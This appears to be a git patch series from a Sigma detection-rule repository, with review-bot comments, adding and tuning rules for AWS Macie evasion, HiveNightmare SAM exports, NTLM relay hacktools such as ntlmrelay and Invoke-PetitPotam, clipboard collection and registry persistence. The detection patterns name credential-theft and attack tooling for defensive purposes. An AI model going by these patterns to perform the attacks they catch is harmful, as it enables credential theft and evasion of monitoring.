@@ -0,0 +1,36 @@ +title: AWS Possible Macie Evasion +id: 91f6a16c-ef71-437a-99ac-0b070e3ad221 +status: experimental +description: Detects evade to Macie detection. +author: Sittikorn S +date: 2021/07/06 +reference: + - https://docs.aws.amazon.com/cli/latest/reference/macie/ +tags: + - attack.defensive_evasion + - attack.t1562.001 +logsource: + service: cloudtrail +detection: + selection: + eventName: + - 'ArchiveFindings' + - 'CreateFindingsFilter' + - 'DeleteMember' + - 'DisassociateFromMasterAccount' + - 'DisassociateMember' + - 'DisableMacie' + - 'UpdateFindingsFilter' + - 'UpdateMacieSession' + - 'UpdateMemberSession' + - 'DisableOrganizationAdminAccount' + - 'UpdateClassificationJob' + - 'UpdateFindingsFilter' + timeframe: 10m + condition: selection | count(eventName) by sourceIPAddress > 5 +fields: + - sourceIPAddress + - userIdentity.arn +falsepositives: + - System or Network administrator behaviors +level: medium From 9de84bf82c749d6a96a93f8437e1802ed017acd9 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 26 Jul 2021 15:26:17 +0700 Subject: [PATCH 0104/1367] Update aws_macic_evasion --- rules/cloud/aws_macic_evasion | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/cloud/aws_macic_evasion b/rules/cloud/aws_macic_evasion index f2305ac3..3d05be20 100644 --- a/rules/cloud/aws_macic_evasion +++ b/rules/cloud/aws_macic_evasion @@ -1,4 +1,5 @@ -title: AWS Possible Macie Evasion +action: global +title: AWS Macie Evasion id: 91f6a16c-ef71-437a-99ac-0b070e3ad221 status: experimental description: Detects evade to Macie detection. @@ -27,7 +28,7 @@ detection: - 'UpdateClassificationJob' - 'UpdateFindingsFilter' timeframe: 10m - condition: selection | count(eventName) by sourceIPAddress > 5 + condition: selection | count() by sourceIPAddress > 5 fields: - sourceIPAddress - userIdentity.arn From 819fcaea18f9401cded121befe936cf2aee3f9c0 Mon Sep 17 00:00:00 2001 
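Review bot: The new rule has no `eventSource` restriction (the Macie v2 API logs as `macie2.amazonaws.com`), and at least `DisassociateFromMasterAccount` and `DisableOrganizationAdminAccount` are, to my knowledge, also action names in GuardDuty and Security Hub, so the count-by-source-IP aggregation will fire on unrelated services. Add `eventSource: macie2.amazonaws.com` to `selection`. Aggregating on `sourceIPAddress` alone also collapses every user behind one NAT, VPN egress or the console proxy into a single bucket; counting by `userIdentity.arn` (already in `fields`), or by both, gives a cleaner signal and a better pivot for the responder. The later commits in this series fix the tag name and the duplicated `UpdateFindingsFilter` entry, so I am not raising those.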
From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 26 Jul 2021 15:38:34 +0700 Subject: [PATCH 0105/1367] Update aws_macic_evasion --- rules/cloud/aws_macic_evasion | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws_macic_evasion b/rules/cloud/aws_macic_evasion index 3d05be20..f2f56b40 100644 --- a/rules/cloud/aws_macic_evasion +++ b/rules/cloud/aws_macic_evasion @@ -5,7 +5,7 @@ status: experimental description: Detects evade to Macie detection. author: Sittikorn S date: 2021/07/06 -reference: +references: - https://docs.aws.amazon.com/cli/latest/reference/macie/ tags: - attack.defensive_evasion From b74ff205a3e0b9767fc14e21b9dfe1488e7f90ec Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 26 Jul 2021 15:43:48 +0700 Subject: [PATCH 0106/1367] Update aws_macic_evasion --- rules/cloud/aws_macic_evasion | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/cloud/aws_macic_evasion b/rules/cloud/aws_macic_evasion index f2f56b40..294d73c1 100644 --- a/rules/cloud/aws_macic_evasion +++ b/rules/cloud/aws_macic_evasion @@ -1,4 +1,3 @@ -action: global title: AWS Macie Evasion id: 91f6a16c-ef71-437a-99ac-0b070e3ad221 status: experimental @@ -24,9 +23,9 @@ detection: - 'UpdateFindingsFilter' - 'UpdateMacieSession' - 'UpdateMemberSession' - - 'DisableOrganizationAdminAccount' - 'UpdateClassificationJob' - 'UpdateFindingsFilter' + - 'DisableOrganizationAdminAccount' timeframe: 10m condition: selection | count() by sourceIPAddress > 5 fields: From 21c4d241a1fe8caffe40a25852b0fc3e7ec9315c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 26 Jul 2021 10:59:35 +0200 Subject: [PATCH 0107/1367] HiveNightmare and Relay attack tools adjustments --- rules/windows/file_event/win_hivenightmare_file_exports.yml | 2 +- rules/windows/process_creation/win_tools_relay_attacks.yml | 2 ++ 2 files changed, 3 insertions(+), 1 deletion(-) 
diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml index 42bb5ee0..47292ac6 100644 --- a/rules/windows/file_event/win_hivenightmare_file_exports.yml +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml @@ -25,7 +25,7 @@ detection: - '\SAM-haxx' # Early C++ versions - '\Sam.save' # PowerShell version - TargetFilename: - - 'C:\windows\temp\sam' + - 'C:\windows\temp\sam' # C# version of HiveNightmare condition: selection fields: - CommandLine diff --git a/rules/windows/process_creation/win_tools_relay_attacks.yml b/rules/windows/process_creation/win_tools_relay_attacks.yml index 89ce6ef1..a795b987 100644 --- a/rules/windows/process_creation/win_tools_relay_attacks.yml +++ b/rules/windows/process_creation/win_tools_relay_attacks.yml @@ -4,6 +4,7 @@ id: 5589ab4f-a767-433c-961d-c91f3f704db1 description: Detects different hacktools used for relay attacks on Windows for privilege escalation author: Florian Roth date: 2021/07/24 +modified: 2021/07/26 references: - https://attack.mitre.org/techniques/T1557/001/ - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ @@ -39,6 +40,7 @@ detection: - ' ntlmrelay' - 'cme smb ' - ' /ntlm:NTLMhash ' + - 'Invoke-PetitPotam' condition: selection_pe or selection_script falsepositives: - Legitimate files with these rare hacktool names From d6078582d1e2574c6cadd324beaa59a791b26006 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 26 Jul 2021 17:16:12 +0700 Subject: [PATCH 0108/1367] Rename aws_macic_evasion to aws_macic_evasion.yml extend .yml --- rules/cloud/{aws_macic_evasion => aws_macic_evasion.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/{aws_macic_evasion => aws_macic_evasion.yml} (100%) 
diff --git a/rules/cloud/aws_macic_evasion b/rules/cloud/aws_macic_evasion.yml similarity index 100% rename from rules/cloud/aws_macic_evasion rename to rules/cloud/aws_macic_evasion.yml From 899baa073e0826e6bda1e5638267cef5b83092c6 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 26 Jul 2021 17:21:47 +0700 Subject: [PATCH 0109/1367] Update aws_macic_evasion.yml --- rules/cloud/aws_macic_evasion.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws_macic_evasion.yml b/rules/cloud/aws_macic_evasion.yml index 294d73c1..8e1676a6 100644 --- a/rules/cloud/aws_macic_evasion.yml +++ b/rules/cloud/aws_macic_evasion.yml @@ -7,7 +7,7 @@ date: 2021/07/06 references: - https://docs.aws.amazon.com/cli/latest/reference/macie/ tags: - - attack.defensive_evasion + - attack.defense_evasion - attack.t1562.001 logsource: service: cloudtrail From 015d179b4161675e00679333f625e3831bfd073a Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 26 Jul 2021 21:27:59 +0700 Subject: [PATCH 0110/1367] Update aws_macic_evasion.yml --- rules/cloud/aws_macic_evasion.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/cloud/aws_macic_evasion.yml b/rules/cloud/aws_macic_evasion.yml index 8e1676a6..07c3c9c5 100644 --- a/rules/cloud/aws_macic_evasion.yml +++ b/rules/cloud/aws_macic_evasion.yml @@ -20,12 +20,11 @@ detection: - 'DisassociateFromMasterAccount' - 'DisassociateMember' - 'DisableMacie' + - 'DisableOrganizationAdminAccount' - 'UpdateFindingsFilter' - 'UpdateMacieSession' - 'UpdateMemberSession' - 'UpdateClassificationJob' - - 'UpdateFindingsFilter' - - 'DisableOrganizationAdminAccount' timeframe: 10m condition: selection | count() by sourceIPAddress > 5 fields: From d2592ee0b60b0428ed12c191793896bf19db1a01 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?G=C3=A1bor=20Lipt=C3=A1k?= Date: Mon, 26 Jul 2021 16:26:03 -0400 Subject: [PATCH 0111/1367] Add yamllint to GHA MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: Gábor Lipták --- .github/workflows/sigma-test.yml | 10 +- Makefile | 4 +- ...d_cmd_and_powershell_spawned_processes.yml | 2 +- ...stall_elevated_parent_child_correlated.yml | 2 +- ..._party_drivers_exploits_token_stealing.yml | 2 +- ...ivilege_escalation_using_rotten_potato.yml | 2 +- .../{invalid_yaml.yml => invalid_yaml.badyml} | 0 tools/config/arcsight-zeek.yml | 4 +- tools/config/ecs-auditd.yml | 5 +- tools/config/ecs-filebeat.yml | 2 +- tools/config/logrhythm_winevent.yml | 140 +++++++++--------- tools/config/winlogbeat-modules-enabled.yml | 3 +- tools/config/winlogbeat.yml | 5 +- 13 files changed, 91 insertions(+), 90 deletions(-) rename tests/{invalid_yaml.yml => invalid_yaml.badyml} (100%) diff --git a/.github/workflows/sigma-test.yml b/.github/workflows/sigma-test.yml index d94d319d..2d1f625b 100644 --- a/.github/workflows/sigma-test.yml +++ b/.github/workflows/sigma-test.yml @@ -8,7 +8,9 @@ on: branches: - "*" pull_request: - branches: [ master, oscd ] + branches: + - master + - oscd jobs: test-sigma: @@ -31,3 +33,9 @@ jobs: - name: Test SQL(ite) Backend run: | pipenv run make test-backend-sql + yamllint: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: yaml-lint + uses: ibiqlik/action-yamllint@v3 diff --git a/Makefile b/Makefile index 96870aec..ea442b75 100644 --- a/Makefile +++ b/Makefile 
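Review bot: The new `yamllint` job pulls `ibiqlik/action-yamllint@v3` (and `actions/checkout@v2`) by a mutable major-version tag, so whoever controls that tag can change what runs in this repository's CI on every push and pull request. For a third-party action the usual hardening is to pin to a full-length commit SHA with the version in a trailing comment, e.g. `uses: ibiqlik/action-yamllint@<40-hex-sha> # v3`, and let Dependabot or Renovate bump it. Since the job only reads the checkout, also consider a workflow-level `permissions: contents: read` so the default `GITHUB_TOKEN` is not writable if the linter is ever compromised. The existing `test-sigma` job's steps are outside the hunk, so I cannot tell whether they have the same issue.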
@@ -104,7 +104,7 @@ test-sigmac: $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml -o $(TMPOUT) - < tests/collection_repeat.yml > /dev/null ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t xpack-watcher -c tools/config/winlogbeat.yml -O output=foobar -O es=es -O foobar rules/windows/builtin/win_susp_failed_logons_single_source.yml > /dev/null ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml tests/not_existing.yml > /dev/null - ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml tests/invalid_yaml.yml > /dev/null + ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml tests/invalid_yaml.badyml > /dev/null ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml tests/invalid_sigma-no_identifiers.yml > /dev/null ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml tests/invalid_sigma-no_condition.yml > /dev/null ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml tests/invalid_sigma-invalid_identifier_reference.yml > /dev/null 
@@ -113,7 +113,7 @@ test-sigmac: ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml rules/windows/builtin/win_susp_failed_logons_single_source.yml ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tools/config/winlogbeat.yml -o /not_possible rules/windows/sysmon/sysmon_mimikatz_detection_lsass.yml ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c not_existing rules/windows/sysmon/sysmon_mimikatz_detection_lsass.yml - ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tests/invalid_yaml.yml rules/windows/sysmon/sysmon_mimikatz_detection_lsass.yml + ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tests/invalid_yaml.badyml rules/windows/sysmon/sysmon_mimikatz_detection_lsass.yml ! $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t es-qs -c tests/invalid_config.yml rules/windows/sysmon/sysmon_mimikatz_detection_lsass.yml test-merge: diff --git a/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml b/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml index ade22426..931cae2c 100644 --- a/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml +++ b/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml @@ -13,7 +13,7 @@ tags: logsource: product: windows category: process_creation - definition : Works only if Enrich Sysmon events with additional information about process in ParentOfParentImage check enrichment section + definition: Works only if Enrich Sysmon events with additional information about process in ParentOfParentImage check enrichment section detection: parent_image: ParentImage|endswith: 
diff --git a/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml b/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml index bcd2772a..07ca9c1a 100644 --- a/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml +++ b/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml @@ -35,7 +35,7 @@ fields: - IntegrityLevel - User - Image - ParentProcessGuid + - ParentProcessGuid falsepositives: - System administrator usage - Penetration test diff --git a/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml b/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml index da3c9882..cd2ce7d8 100644 --- a/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml +++ b/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml @@ -12,7 +12,7 @@ date: 2019/06/03 logsource: category: process_creation product: windows - definition : Works only if Enrich Sysmon events with additional information about process in ParentIntegrityLevel check enrichment section + definition: Works only if Enrich Sysmon events with additional information about process in ParentIntegrityLevel check enrichment section detection: selection: ParentIntegrityLevel: Medium diff --git a/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml b/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml index 45351522..94c1560f 100644 --- a/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml +++ b/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml 
@@ -15,7 +15,7 @@ modified: 2020/09/01 logsource: category: process_creation product: windows - definition : Works only if Enrich Sysmon events with additional information about process in ParentUser check enrichment section + definition: Works only if Enrich Sysmon events with additional information about process in ParentUser check enrichment section detection: selection: ParentUser: diff --git a/tests/invalid_yaml.yml b/tests/invalid_yaml.badyml similarity index 100% rename from tests/invalid_yaml.yml rename to tests/invalid_yaml.badyml diff --git a/tools/config/arcsight-zeek.yml b/tools/config/arcsight-zeek.yml index f9544552..a9272cc2 100644 --- a/tools/config/arcsight-zeek.yml +++ b/tools/config/arcsight-zeek.yml @@ -458,7 +458,7 @@ fieldmappings: #service=http: #service=sip: msg: - - 'message' + - 'message' #service=notice: #service=pop3: name: @@ -832,7 +832,7 @@ fieldmappings: #password: pending: message #status: message - successful_commands: message + successful_commands: message #username: sourceUserName # Radius connect_info: message diff --git a/tools/config/ecs-auditd.yml b/tools/config/ecs-auditd.yml index 43e84fcc..c5c9a0cc 100644 --- a/tools/config/ecs-auditd.yml +++ b/tools/config/ecs-auditd.yml @@ -1,4 +1,4 @@ -title: Elastic Auditbeat (from 7.x) index pattern and field mapping following Elastic enabled Modules +title: Elastic Auditbeat (from 7.x) index pattern and field mapping following Elastic enabled Modules order: 20 backends: - es-qs @@ -70,7 +70,6 @@ fieldmappings: data: data default-context: default-context dev: dev - dev: dev device: device dir: dir direction: direction @@ -92,7 +91,6 @@ fieldmappings: feature: feature fi: fi fp: fp - fp: fp format: format fsgid: fsgid fsuid: fsuid @@ -169,7 +167,6 @@ fieldmappings: ogid: ogid ocomm: ocomm old: old - old: old old-auid: old-auid old-chardev: old-chardev old-disk: old-disk diff --git a/tools/config/ecs-filebeat.yml b/tools/config/ecs-filebeat.yml index 8c95dac0..dd85cc7a 100644 
--- a/tools/config/ecs-filebeat.yml +++ b/tools/config/ecs-filebeat.yml @@ -1,4 +1,4 @@ -title: Elastic filebeat (from 7.x) index pattern and field mapping following Elastic Common Schema +title: Elastic filebeat (from 7.x) index pattern and field mapping following Elastic Common Schema order: 20 backends: - es-qs diff --git a/tools/config/logrhythm_winevent.yml b/tools/config/logrhythm_winevent.yml index 84b6bee4..9ca034ab 100644 --- a/tools/config/logrhythm_winevent.yml +++ b/tools/config/logrhythm_winevent.yml 
@@ -1,71 +1,71 @@ ---- -title: LogRhythm Windows EventID Field Mapping - -order: 20 -backends: - - es-qs-lr - -logsources: - eventlogs: - product: windows - conditions: - logSourceTypeName: 'MS Windows Event Logging XML - Security' - -fieldmappings: - EventID: vendorMessageID - TicketOptions: object - TicketEncryptionType: sessionType - ServiceName: processName - TargetUserName: - - originUser - - impactedUser - Workstation: originHostname - SubjectUserName: originUser - LogonType: command - LogonProcessName: processName - WorkstationName: - - originHostname - - impactedHostname - SubjectLogonId: session - SubStatus: status - IpPort: originPort - IpAddress: - - originIp - - impactedIp - ErrorCode: responseCode - Task: vendorInfo - PrivilegeList: subject - SamAccountName: impactedUser - PrimaryGroupId: group - StatusCode: responseCode - Level: severity - SubjectDomainName: domainOrigin - DSName: domainImpacted - ObjectDN: objectName - ObjectGUID: object - ObjectClass: objectType - OperationType: action - Computer: impactedHostname - CategoryId: policy - SubcategoryId: objectName - SubCategoryGuid: object - AuditPolicyChanges: action - ObjectCollectionName: objectType - CountOfCredentialsReturned: quantity - AlgorithmName: policy - KeyName: objectName - KeyType: objectType - KeyFilePath: object - Operation: action - ReturnCode: responseCode - ChannelType: objectType - DomainName: domainImpacted - ExecutionProcessId: processId - processName: process - ProviderName: vendorInfo - SChannelName: objectName - SecureChannelName: objectName - ThreadId: session - UserName: - - originUser +--- +title: LogRhythm Windows EventID Field Mapping + +order: 20 +backends: + - es-qs-lr + +logsources: + eventlogs: + product: windows + conditions: + logSourceTypeName: 'MS Windows Event Logging XML - Security' + +fieldmappings: + EventID: vendorMessageID + TicketOptions: object + TicketEncryptionType: sessionType + ServiceName: processName + TargetUserName: + - originUser + - impactedUser 
+ Workstation: originHostname + SubjectUserName: originUser + LogonType: command + LogonProcessName: processName + WorkstationName: + - originHostname + - impactedHostname + SubjectLogonId: session + SubStatus: status + IpPort: originPort + IpAddress: + - originIp + - impactedIp + ErrorCode: responseCode + Task: vendorInfo + PrivilegeList: subject + SamAccountName: impactedUser + PrimaryGroupId: group + StatusCode: responseCode + Level: severity + SubjectDomainName: domainOrigin + DSName: domainImpacted + ObjectDN: objectName + ObjectGUID: object + ObjectClass: objectType + OperationType: action + Computer: impactedHostname + CategoryId: policy + SubcategoryId: objectName + SubCategoryGuid: object + AuditPolicyChanges: action + ObjectCollectionName: objectType + CountOfCredentialsReturned: quantity + AlgorithmName: policy + KeyName: objectName + KeyType: objectType + KeyFilePath: object + Operation: action + ReturnCode: responseCode + ChannelType: objectType + DomainName: domainImpacted + ExecutionProcessId: processId + processName: process + ProviderName: vendorInfo + SChannelName: objectName + SecureChannelName: objectName + ThreadId: session + UserName: + - originUser - impactedUser \ No newline at end of file diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 5cfb81d3..eb3bf37c 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -225,7 +225,6 @@ fieldmappings: Accesses: winlog.event_data.Accesses AccessList: winlog.event_data.AccessList AttributeValue: winlog.event_data.AttributeValue - AttributeValue: winlog.event_data.AttributeValue AuditSourceName: winlog.event_data.AuditSourceName AuthenticationPackage: winlog.event_data.AuthenticationPackageName CallerProcessName: winlog.event_data.CallerProcessName 
@@ -279,4 +278,4 @@ fieldmappings: TaskName: winlog.event_data.TaskName # UserName => smbclient-security eventid:31017 UserName: winlog.event_data.UserName - Workstation : winlog.event_data.Workstation + Workstation: winlog.event_data.Workstation diff --git a/tools/config/winlogbeat.yml b/tools/config/winlogbeat.yml index 97b5fa80..87ffb4ac 100644 --- a/tools/config/winlogbeat.yml +++ b/tools/config/winlogbeat.yml @@ -203,8 +203,6 @@ fieldmappings: ContextInfo: winlog.event_data.ContextInfo # from here missing field at 20210706 Accesses: winlog.event_data.Accesses - AccessList: winlog.event_data.AccessList - AttributeValue: winlog.event_data.AttributeValue AttributeValue: winlog.event_data.AttributeValue AuditSourceName: winlog.event_data.AuditSourceName AuthenticationPackage: winlog.event_data.AuthenticationPackageName @@ -214,7 +212,6 @@ fieldmappings: Company: winlog.event_data.Company DestAddress: winlog.event_data.DestAddress Destination: winlog.event_data.Destination - DestinationIsIpv6: winlog.event_data.DestinationIsIpv6 DestPort: winlog.event_data.DestPort Device: winlog.event_data.Device DeviceDescription: winlog.event_data.DeviceDescription @@ -258,4 +255,4 @@ fieldmappings: TaskName: winlog.event_data.TaskName # UserName => smbclient-security eventid:31017 UserName: winlog.event_data.UserName - Workstation : winlog.event_data.Workstation + Workstation: winlog.event_data.Workstation From 6f62f5f2516d2655a9b0502efa5555fe520be594 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Jul 2021 08:04:24 +0200 Subject: [PATCH 0112/1367] Update azure_kubernetes_pods_deleted.yml --- rules/cloud/azure_kubernetes_pods_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_pods_deleted.yml b/rules/cloud/azure_kubernetes_pods_deleted.yml index 95f31977..53ea882c 100644 --- a/rules/cloud/azure_kubernetes_pods_deleted.yml +++ b/rules/cloud/azure_kubernetes_pods_deleted.yml 
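Review bot: The `@@ -203,8 +203,6 @@` hunk in winlogbeat.yml drops the `AccessList: winlog.event_data.AccessList` and `DestinationIsIpv6: winlog.event_data.DestinationIsIpv6` mappings along with the duplicated `AttributeValue`, but unlike `AttributeValue` no surviving definition of those two keys is visible here. If they are yamllint duplicate-key hits against an earlier definition above line 203 that is fine; if not, any rule referencing `AccessList` or `DestinationIsIpv6` silently loses its mapping and likely compiles with the bare Sigma field name. Worth a quick `grep -n 'AccessList\|DestinationIsIpv6' tools/config/winlogbeat.yml` before merging and a one-line note in the commit message that the removed keys were duplicates. The sibling winlogbeat-modules-enabled.yml hunk keeps `AccessList`, which is what makes me ask.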
@@ -11,7 +11,7 @@ logsource: service: azure.activitylogs detection: selection_operation_name: - - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE condition: selection_operation_name level: medium tags: From ade5e80f9d59fa1d354e801664ac285f1f0eb89f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Jul 2021 08:07:00 +0200 Subject: [PATCH 0113/1367] Update azure_kubernetes_events_deleted.yml --- rules/cloud/azure_kubernetes_events_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_events_deleted.yml b/rules/cloud/azure_kubernetes_events_deleted.yml index 775c650a..b84ac76a 100644 --- a/rules/cloud/azure_kubernetes_events_deleted.yml +++ b/rules/cloud/azure_kubernetes_events_deleted.yml @@ -11,7 +11,7 @@ logsource: service: azure.activitylogs detection: selection_operation_name: - - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE + properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE condition: selection_operation_name level: medium tags: From 8aa79b9d86db613c8bf3a8691e3d931eb01f815c Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 08:50:03 +0200 Subject: [PATCH 0114/1367] add process_creation_clip.yml --- .../process_creation_clip.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_clip.yml diff --git a/rules/windows/process_creation/process_creation_clip.yml b/rules/windows/process_creation/process_creation_clip.yml new file mode 100644 index 00000000..9bef6b0f --- /dev/null +++ b/rules/windows/process_creation/process_creation_clip.yml 
@@ -0,0 +1,22 @@ +title: Use of CLIP +id: ddeff553-5233-4ae9-bbab-d64d2bd634be +status: experimental +author: frack113 +date: 2021/07/27 +description: Adversaries may collect data stored in the clipboard from users copying information within or between applications. +references: + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md +tags: + - attack.collection + - attack.t1115 +logsource: + category: process_creation + product: windows +detection: + selection: + OriginalFileName: clip.exe + condition: selection +falsepositives: + - Unknown +level: low From f3bcffeb0a72bca185739317eaab1b1ba97566df Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 27 Jul 2021 09:58:00 +0200 Subject: [PATCH 0115/1367] Tune false positive --- .../windows/registry_event/sysmon_office_vsto_persistence.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry_event/sysmon_office_vsto_persistence.yml b/rules/windows/registry_event/sysmon_office_vsto_persistence.yml index 8eac61ee..c8dbeb08 100644 --- a/rules/windows/registry_event/sysmon_office_vsto_persistence.yml +++ b/rules/windows/registry_event/sysmon_office_vsto_persistence.yml @@ -4,17 +4,19 @@ status: experimental description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications. references: - https://twitter.com/_vivami/status/1347925307643355138 + - https://vanmieghem.io/stealth-outlook-persistence/ tags: - attack.t1137.006 - attack.persistence author: Bhabesh Raj date: 2021/01/10 -modified: 2021/06/01 +modified: 2021/07/27 logsource: category: registry_event product: windows detection: selection: + EventType: SetValue TargetObject|contains: - '\Software\Microsoft\Office\Outlook\Addins\' - '\Software\Microsoft\Office\Word\Addins\' From 7287a46f2fb2ea143eb7272e57d292d86feeba1a Mon Sep 17 00:00:00 2001 
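Review bot: `OriginalFileName: clip.exe` is the only selector, and that field comes from the PE version resource and is populated by Sysmon event 1 but not by Security 4688, so on telemetry without Sysmon the rule matches nothing, and it also misses a copy whose version info has been stripped. Pairing it with the image path as an OR, `selection:` followed by `- OriginalFileName: clip.exe` and `- Image|endswith: '\clip.exe'`, covers both sources. The rule also fires on every interactive use of `clip`; since `falsepositives` says `Unknown`, I would at least list `Legitimate use by administrators piping command output to the clipboard` so analysts triage it as the `level: low` hunting signal it is.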
From: frack113 Date: Tue, 27 Jul 2021 10:05:57 +0200 Subject: [PATCH 0116/1367] Tune false positive --- rules/windows/registry_event/sysmon_taskcache_entry.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/windows/registry_event/sysmon_taskcache_entry.yml b/rules/windows/registry_event/sysmon_taskcache_entry.yml index 03465933..a4b72df0 100644 --- a/rules/windows/registry_event/sysmon_taskcache_entry.yml +++ b/rules/windows/registry_event/sysmon_taskcache_entry.yml @@ -6,6 +6,7 @@ tags: - attack.t1053 - attack.t1053.005 date: 2021/06/18 +modified: 2021/07/27 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ author: Syed Hasan (@syedhasan009) @@ -17,5 +18,6 @@ logsource: product: windows detection: selection: + EventType: SetValue TargetObject|contains: 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\' condition: selection From 1a538371c9b447d1c736b4ea319bc0fcb8aba63b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Jul 2021 10:14:03 +0200 Subject: [PATCH 0117/1367] fix: bug in author field (not list) --- rules/windows/process_creation/sysmon_apt_sourgrum.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/windows/process_creation/sysmon_apt_sourgrum.yml b/rules/windows/process_creation/sysmon_apt_sourgrum.yml index 8ea9ea53..1a6c50cd 100644 --- a/rules/windows/process_creation/sysmon_apt_sourgrum.yml +++ b/rules/windows/process_creation/sysmon_apt_sourgrum.yml @@ -1,9 +1,7 @@ title: SOURGUM Actor Behaviours id: 7ba08e95-1e0b-40cd-9db5-b980555e42fd description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM -author: - - MSTIC - - FPT.EagleEye +author: MSTIC, FPT.EagleEye status: experimental level: high references: From 90ca1a8ad2e5c96d09a9ae4ff92483a2110d49ff Mon Sep 17 00:00:00 2001 
